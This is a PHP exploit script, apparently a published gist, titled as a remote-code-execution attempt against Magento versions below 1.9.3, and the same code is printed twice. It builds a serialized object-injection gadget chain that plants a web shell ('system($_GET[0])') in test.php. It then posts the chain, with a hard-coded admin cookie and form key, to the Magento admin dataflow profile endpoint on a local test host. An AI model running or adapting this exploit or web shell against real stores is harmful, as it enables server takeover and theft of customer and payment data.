tampe125/Magento < 1.9.3 RCE Attempt.php Secret

## Magento < 1.9.3 RCE Attempt.php
<?php
ini_set('display_errors', 1);

class Varien_Object implements ArrayAccess
{
	public function offsetExists($offset)
	{
		// TODO: Implement offsetExists() method.
	}

	public function offsetGet($offset)
	{
		// TODO: Implement offsetGet() method.
	}

	public function offsetSet($offset, $value)
	{
		// TODO: Implement offsetSet() method.
	}

	public function offsetUnset($offset)
	{
		// TODO: Implement offsetUnset() method.
	}
}

abstract class Varien_Simplexml_Config_Cache_Abstract extends Varien_Object
{
	protected $_data;
}

class Varien_Simplexml_Config_Cache_File extends Varien_Simplexml_Config_Cache_Abstract
{
	function __construct($data){
		$this->_data = $data;
	}
}

class Credis_Client{
	const TYPE_STRING      = 'string';
	const TYPE_LIST        = 'list';
	const TYPE_SET         = 'set';
	const TYPE_ZSET        = 'zset';
	const TYPE_HASH        = 'hash';
	const TYPE_NONE        = 'none';
	const FREAD_BLOCK_SIZE = 8192;

	protected $redis;
	protected $redisMulti;
	protected $host;
	protected $port;
	protected $timeout;
	protected $readTimeout;
	protected $persistent;
	protected $closeOnDestruct = TRUE;
	protected $connected = TRUE;
	protected $standalone;
	protected $maxConnectRetries = 0;
	protected $connectFailures = 0;
	protected $usePipeline = FALSE;
	protected $commandNames;
	protected $commands;
	protected $isMulti = FALSE;
	protected $isWatching = FALSE;
	protected $authPassword;
	protected $selectedDb = 0;
	protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem');
	protected $renamedCommands;
	protected $requests = 0;

	public function __construct($resource)
	{
		$this->redis = new Mage_Sales_Model_Order_Payment_Transaction($resource);
		$this->connected = true;
	}
}

abstract class Mage_Core_Model_Abstract extends Varien_Object
{

}

class Mage_Sales_Model_Order_Payment_Transaction extends Mage_Core_Model_Abstract
{
	const TYPE_PAYMENT = 'payment';
	const TYPE_ORDER = 'order';
	const TYPE_AUTH = 'authorization';
	const TYPE_CAPTURE = 'capture';
	const TYPE_VOID = 'void';
	const TYPE_REFUND = 'refund';
	const RAW_DETAILS = 'raw_details_info';

	protected $_order = null;
	protected $_parentTransaction = null;
	protected $_children = null;
	protected $_identifiedChildren = null;
	protected $_transactionsAutoLinking = true;
	protected $_isFailsafe = true;
	protected $_hasChild = null;
	protected $_eventPrefix = 'sales_order_payment_transaction';
	protected $_eventObject = 'order_payment_transaction';
	protected $_orderWebsiteId = null;
	protected $_orderFactory;
	protected $_dateFactory;
	protected $_transactionFactory;
	protected $orderPaymentRepository;
	protected $orderRepository;
	protected $_resourceName;

	public function __construct($resource)
	{
		$this->_resource = $resource;
		$this->_resourceName = 'varien/simplexml';
	}
}

class Mage_Core_Model_Resource_Transaction{
	protected $_objects = [];
	protected $_objectsByAlias = [];
	protected $_beforeCommitCallbacks = ["phpinfo"];
}

// $resource = new Mage_Core_Model_Resource_Transaction();

$data = [];
$data['is_allowed_to_save'] = true;
$data['stat_file_name'] = 'test.php';
$data['components'] = '<?php system($_GET[0]); ?>';
$resource = new Varien_Simplexml_Config_Cache_File($data);

$redis = new Credis_Client($resource);
$serialized = serialize($redis);

$HOST 	  = 'http://magento.local';
$KEY      = '9628f99d0785aee59c9b050a89f9b740';
$FORM_KEY = 'ubkshdxFlFHLshgz';
$COOKIE   = '87ca01fcf63c4684f6cc0722696c8d3e';

$post_fields = array(
	'form_key' 			=> $FORM_KEY,
	'profile_id' 		=> '6',
	'name' 				=> 'Import Customers',
	'entity_type' 		=> 'customer',
	'direction' 		=> 'import',
	'store_id' 			=> '0',
	'gui_data' 			=> $serialized,
	'data_transfer' 	=> 'interactive',
	'file_1' 			=> '',
	'file_2' 			=> '',
	'file_3' 			=> '',
	'files' 			=> '',
	'actions_xml_view' 	=> '<action type="dataflow/convert_parser_xml_excel" method="parse">\r\n    <var name="single_sheet"><![CDATA[]]></var>\r\n    <var name="fieldnames"></var>\r\n    <var name="store"><![CDATA[0]]></var>\r\n    <var name="number_of_records">1</var>\r\n    <var name="decimal_separator"><![CDATA[.]]></var>\r\n    <var name="adapter">customer/convert_adapter_customer</var>\r\n    <var name="method">parse</var>\r\n</action>',
	'page' 				=> '1',
	'limit' 			=> '20',
);

$c = curl_init($HOST.'/index.php/admin/system_convert_gui/save/key/'.$KEY.'/continue/true/');
curl_setopt($c, CURLOPT_HTTPHEADER, array(
	'Host: magento.local',
	'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0',
	'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Language: en-US,it-IT;q=0.8,it;q=0.5,en;q=0.3',
	'Accept-Encoding: gzip, deflate',
	'Cookie: adminhtml='.$COOKIE.'; XDEBUG_SESSION=PHPSTORM',
	)
);
curl_setopt($c, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$rc = curl_exec($c);

print(curl_errno($c));

curl_close($c);
	<?php
	ini_set('display_errors', 1);

	class Varien_Object implements ArrayAccess
	{
	public function offsetExists($offset)
	{
	// TODO: Implement offsetExists() method.
	}

	public function offsetGet($offset)
	{
	// TODO: Implement offsetGet() method.
	}

	public function offsetSet($offset, $value)
	{
	// TODO: Implement offsetSet() method.
	}

	public function offsetUnset($offset)
	{
	// TODO: Implement offsetUnset() method.
	}
	}

	abstract class Varien_Simplexml_Config_Cache_Abstract extends Varien_Object
	{
	protected $_data;
	}

	class Varien_Simplexml_Config_Cache_File extends Varien_Simplexml_Config_Cache_Abstract
	{
	function __construct($data){
	$this->_data = $data;
	}
	}

	class Credis_Client{
	const TYPE_STRING = 'string';
	const TYPE_LIST = 'list';
	const TYPE_SET = 'set';
	const TYPE_ZSET = 'zset';
	const TYPE_HASH = 'hash';
	const TYPE_NONE = 'none';
	const FREAD_BLOCK_SIZE = 8192;

	protected $redis;
	protected $redisMulti;
	protected $host;
	protected $port;
	protected $timeout;
	protected $readTimeout;
	protected $persistent;
	protected $closeOnDestruct = TRUE;
	protected $connected = TRUE;
	protected $standalone;
	protected $maxConnectRetries = 0;
	protected $connectFailures = 0;
	protected $usePipeline = FALSE;
	protected $commandNames;
	protected $commands;
	protected $isMulti = FALSE;
	protected $isWatching = FALSE;
	protected $authPassword;
	protected $selectedDb = 0;
	protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem');
	protected $renamedCommands;
	protected $requests = 0;

	public function __construct($resource)
	{
	$this->redis = new Mage_Sales_Model_Order_Payment_Transaction($resource);
	$this->connected = true;
	}
	}

	abstract class Mage_Core_Model_Abstract extends Varien_Object
	{

	}

	class Mage_Sales_Model_Order_Payment_Transaction extends Mage_Core_Model_Abstract
	{
	const TYPE_PAYMENT = 'payment';
	const TYPE_ORDER = 'order';
	const TYPE_AUTH = 'authorization';
	const TYPE_CAPTURE = 'capture';
	const TYPE_VOID = 'void';
	const TYPE_REFUND = 'refund';
	const RAW_DETAILS = 'raw_details_info';

	protected $_order = null;
	protected $_parentTransaction = null;
	protected $_children = null;
	protected $_identifiedChildren = null;
	protected $_transactionsAutoLinking = true;
	protected $_isFailsafe = true;
	protected $_hasChild = null;
	protected $_eventPrefix = 'sales_order_payment_transaction';
	protected $_eventObject = 'order_payment_transaction';
	protected $_orderWebsiteId = null;
	protected $_orderFactory;
	protected $_dateFactory;
	protected $_transactionFactory;
	protected $orderPaymentRepository;
	protected $orderRepository;
	protected $_resourceName;

	public function __construct($resource)
	{
	$this->_resource = $resource;
	$this->_resourceName = 'varien/simplexml';
	}
	}

	class Mage_Core_Model_Resource_Transaction{
	protected $_objects = [];
	protected $_objectsByAlias = [];
	protected $_beforeCommitCallbacks = ["phpinfo"];
	}

	// $resource = new Mage_Core_Model_Resource_Transaction();

	$data = [];
	$data['is_allowed_to_save'] = true;
	$data['stat_file_name'] = 'test.php';
	$data['components'] = '<?php system($_GET[0]); ?>';
	$resource = new Varien_Simplexml_Config_Cache_File($data);

	$redis = new Credis_Client($resource);
	$serialized = serialize($redis);

	$HOST = 'http://magento.local';
	$KEY = '9628f99d0785aee59c9b050a89f9b740';
	$FORM_KEY = 'ubkshdxFlFHLshgz';
	$COOKIE = '87ca01fcf63c4684f6cc0722696c8d3e';

	$post_fields = array(
	'form_key' => $FORM_KEY,
	'profile_id' => '6',
	'name' => 'Import Customers',
	'entity_type' => 'customer',
	'direction' => 'import',
	'store_id' => '0',
	'gui_data' => $serialized,
	'data_transfer' => 'interactive',
	'file_1' => '',
	'file_2' => '',
	'file_3' => '',
	'files' => '',
	'actions_xml_view' => '<action type="dataflow/convert_parser_xml_excel" method="parse">\r\n <var name="single_sheet"><![CDATA[]]></var>\r\n <var name="fieldnames"></var>\r\n <var name="store"><![CDATA[0]]></var>\r\n <var name="number_of_records">1</var>\r\n <var name="decimal_separator"><![CDATA[.]]></var>\r\n <var name="adapter">customer/convert_adapter_customer</var>\r\n <var name="method">parse</var>\r\n</action>',
	'page' => '1',
	'limit' => '20',
	);

	$c = curl_init($HOST.'/index.php/admin/system_convert_gui/save/key/'.$KEY.'/continue/true/');
	curl_setopt($c, CURLOPT_HTTPHEADER, array(
	'Host: magento.local',
	'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0',
	'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8',
	'Accept-Language: en-US,it-IT;q=0.8,it;q=0.5,en;q=0.3',
	'Accept-Encoding: gzip, deflate',
	'Cookie: adminhtml='.$COOKIE.'; XDEBUG_SESSION=PHPSTORM',
	)
	);
	curl_setopt($c, CURLOPT_POSTFIELDS, $post_fields);
	curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
	$rc = curl_exec($c);

	print(curl_errno($c));

	curl_close($c);